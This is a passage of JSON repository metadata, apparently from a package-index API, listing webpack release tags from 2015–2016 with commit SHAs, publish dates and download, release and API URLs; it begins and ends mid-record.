"2016-04-21T23:03:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6/manifests"},{"name":"v1.13.0","sha":"006d59500de0493c4096d5d4cecd64eb12db2b95","kind":"tag","published_at":"2016-04-15T13:18:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0/manifests"},{"name":"v1.12.15","sha":"ee1b8c43b474b22a20bfc25daf0ee153dfb2ef9f","kind":"tag","published_at":"2016-04-10T22:47:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15/manifests"},{"name":"v2.1.0-beta.5","sha":"54405b59b1dd9724e145d4d16726a926042d0e1d","kind":"tag","published_at":"2016-04-10T22:45:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5/manifests"},{"name":"v2.1.0-beta.4","sha":"c5cc1d25a2a4c0fabdec49a86b3bc62a5d637729","kind":"tag","published_at":"2016-02-24T22:58:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4/manifests"},{"name":"v2.1.0-beta.3","sha":"13f8b690f0eb9e6058c10631e01e54fb88cd7143","kind":"tag","published_at":"2016-02-22T22:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3/manifests"},{"name":"v1.12.14","sha":"3ed27836b488401a7e9be2de1491a868a8b6f123","kind":"tag","published_at":"2016-02-22T22:04:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14/manifests"},{"name":"v2.1.0-beta.2","sha":"69d0d2e4cfe9545d530c4e1bcb59ea01969a9908","kind":"tag","published_at":"2016-02-22T14:31:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2/manifests"},{"name":"v2.1.0-beta.1","sha":"fd1e68f5826743b72590e8a97bcfb3d7f78745dd","kind":"tag","published_at":"2016-02-22T12:29:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1/manifests"},{"name":"v2.1.0-beta.0","sha":"52822286a347bf525eeab7f035341fc25e857914","kind":"tag","published_at":"2016-02-22T08:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0/manifests"},{"name":"v1.12.13","sha":"668a5f0bc68cad70c5182ebcab8b3b1a340e038d","kind":"tag","published_at":"2016-02-04T14:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13/manifests"},{"name":"v2.0.7-beta","sha":"432bf35df499e09585c0efeedb3ddbed337d3ed9","kind":"tag","published_at":"2016-02-04T13:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.7-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.7-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.7-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta/manifests"},{"name":"v2.0.6-beta","sha":"71f0945a81e83cc87026d62424f504d00dc6aec3","kind":"tag","published_at":"2016-01-30T12:24:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.6-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.6-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.6-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta/manifests"},{"name":"v2.0.5-beta","sha":"ac45c3c1a4c9b51eceecba79c6ae1a60887368de","kind":"tag","published_at":"2016-01-26T17:20:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.5-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.5-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.5-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta/manifests"},{"name":"v1.12.12","sha":"c0420f1ca8e2a444a5b5192a58d88d8d7d710bb7","kind":"tag","published_at":"2016-01-23T12:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12/manifests"},{"name":"v2.0.4-beta","sha":"bba8afdeef79a7c6e1be6688107fdff3109463bc","kind":"tag","published_at":"2016-01-21T18:19:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.4-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.4-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.4-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta/manifests"},{"name":"v2.0.3-beta","sha":"b7754b645e50608165e0a28ca4735cd0efcfa0d9","kind":"tag","published_at":"2016-01-21T18:16:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.3-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.3-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.3-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta/manifests"},{"name":"v1.12.11","sha":"ab433884f140d694241c54e9c6f9de7f049aec6d","kind":"tag","published_at":"2016-01-11T18:14:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11/manifests"},{"name":"v1.12.10","sha":"66142f2f89868b8e380c4883513cb974680e20e2","kind":"tag","published_at":"2016-01-06T19:29:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10/manifests"},{"name":"v2.0.2-beta","sha":"0915889feb8558a07b053010e56748566e108285","kind":"tag","published_at":"2015-12-22T11:53:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.2-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.2-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.2-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta/manifests"},{"name":"v2.0.1-beta","sha":"11932d75a4c8034e5d8afb50985159d33fdb8ddc","kind":"tag","published_at":"2015-11-24T07:28:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.1-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.1-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.1-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta/manifests"},{"name":"v1.12.9","sha":"9766f2bde3c3f3e7b3b0e914c9cb81ea3a12e823","kind":"tag","published_at":"2015-11-24T07:09:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9/manifests"},{"name":"v1.12.8","sha":"b59528164913d1234e9dccc55bdfbba2e75767d2","kind":"tag","published_at":"2015-11-20T20:32:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8/manifests"},{"name":"v1.12.7","sha":"a6c4414a7f38d8098f128bc50e8c83ed4a9de607","kind":"tag","published_at":"2015-11-20T19:32:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7/manifests"},{"name":"v1.12.6","sha":"7c3e68e8df03cdcef7a6102f61ed4b8cc91cda78","kind":"tag","published_at":"2015-11-14T08:29:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6/manifests"},{"name":"v1.12.5","sha":"3266bbcd16f8a80c35fcd518bf2fb2fe8997692c","kind":"tag","published_at":"2015-11-13T21:25:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5/manifests"},{"name":"v1.12.4","sha":"530f669e13770ccf5082f29dbde1b114e6173a07","kind":"tag","published_at":"2015-11-10T20:29:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4/manifests"},{"name":"v1.12.3","sha":"f3d65ef1b5a6ebba85083536e3a705fe96d31220","kind":"tag","published_at":"2015-11-06T00:10:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3/manifests"},{"name":"v2.0.0-beta","sha":"b2ba75b4c4360b0f14cb23fdb66355457de6f810","kind":"commit","published_at":"2015-11-01T22:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.0-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.0-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.0-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta/manifests"},{"name":"v1.12.2","sha":"89fda6a575eb379d974a30a5229d74c77ba35cc5","kind":"tag","published_at":"2015-09-16T21:13:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"cfcac5e3b62a52012318204dc798d7394e9ac6a9","kind":"tag","published_at":"2015-09-03T12:26:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"f155f32271ff81fee546c86b5685803377cebc09","kind":"tag","published_at":"2015-08-25T08:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0/manifests"},{"name":"v1.11.0","sha":"5335781be8c06c2ff9443431a196f6a94ca80bb3","kind":"tag","published_at":"2015-08-06T11:30:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0/manifests"},{"name":"v1.10.5","sha":"c4d78f7ca6e4a20e5b68f2720970a08cadb013e4","kind":"tag","published_at":"2015-07-23T22:04:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5/manifests"},{"name":"v1.10.4","sha":"107aa63c452d46c0628c53b856bd95e7e3d1b4ed","kind":"tag","published_at":"2015-07-23T21:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4/manifests"},{"name":"v1.10.3","sha":"b99eb70ce63ad33e23e9eef5ee6b4511846acba2","kind":"tag","published_at":"2015-07-22T21:53:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"c2a8b8a843609cbeeeafe92f81894dbe306d38a0","kind":"tag","published_at":"2015-07-22T20:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"f711f66f4cec8c72ba6a831eba8e662149508951","kind":"tag","published_at":"2015-07-02T13:25:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"df4e2e4e3df27d682feb962b896595d7eab27c2a","kind":"tag","published_at":"2015-06-27T20:50:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0/manifests"},{"name":"v1.9.13","sha":"e925c52a0e9fa55b06ffcc3b575e7f1621714056","kind":"tag","published_at":"2015-06-27T09:38:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13/manifests"},{"name":"v1.9.12","sha":"ba03fda4b5d2a515ccd87d26f3edd0dd357c4fde","kind":"tag","published_at":"2015-06-24T21:24:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12/manifests"},{"name":"v1.9.11","sha":"4c0f4afe8710376726a85c756729dc5e0b86fb95","kind":"tag","published_at":"2015-06-14T10:05:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11/manifests"},{"name":"v1.9.10","sha":"4de7bed0f946e42e6dde546ba35233e4eeb87c9d","kind":"tag","published_at":"2015-05-25T19:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10/manifests"},{"name":"v1.9.9","sha":"407d1bc76b41717a47f87211ffd6cbdfff6c7b1e","kind":"tag","published_at":"2015-05-24T07:35:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9/manifests"},{"name":"v1.9.8","sha":"69df24cc562c10caf5c02f36459ecacb7cd1823d","kind":"tag","published_at":"2015-05-21T22:16:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8/manifests"},{"name":"v1.9.7","sha":"0990aaa4754969e34184657577389b88fd845e87","kind":"tag","published_at":"2015-05-17T17:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7/manifests"},{"name":"v1.9.6","sha":"c5eceb0b2cf31fca84e724d3893d44c7042b9038","kind":"tag","published_at":"2015-05-15T15:24:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.6","d